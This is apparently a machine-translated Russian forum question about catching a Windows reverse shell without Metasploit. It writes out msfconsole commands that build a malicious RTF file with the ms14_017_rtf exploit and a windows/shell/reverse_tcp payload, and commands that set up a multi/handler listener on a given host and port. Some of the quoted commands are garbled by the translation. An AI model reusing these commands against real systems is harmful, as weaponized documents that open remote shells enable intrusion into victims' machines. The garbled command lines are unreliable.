Извините за мой английский. Используя metasploit, я создал эксплойт для Windows 7 с полезной нагрузкой windows/shell/reverse_tcp. Тогда я ждал соединение с использованием msfconsole:Автономный мульти/погрузчик reverse_tcp
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
Я успешно подключен к командной строке окна. Однако мне нужно ожидать соединения, не используя metasploit. Я нашел, как создать автономный модуль, но это было только для эксплойта. Мне нужен автономный мульти/обработчик reverse_tcp или просто код, который прослушивает определенный порт, а затем дает доступ к командной строке.
Благодарим за отзыв. Я пробовал nc раньше. Соединение установлено. Но я не могу отправлять команды (dir или другой). Я печатаю dir на сервере (где выполняется nc), но ничего не происходит. – tiigg
Какую команду вы использовали для создания shellcode? –
'использование эксплуатируют/окна/FileFormat/ms14_017_rtf'
' набор полезной нагрузки окна/оболочка/reverse_tcp'
'установить имя файла readme.rtf'
' набор lhost 192.168.182.129'
'эксплуатируют '
Он генерирует rtf-файл с обратной нагрузкой tcp. Затем я запускаю этот файл в окнах. А окна должны подключаться к серверу. – tiigg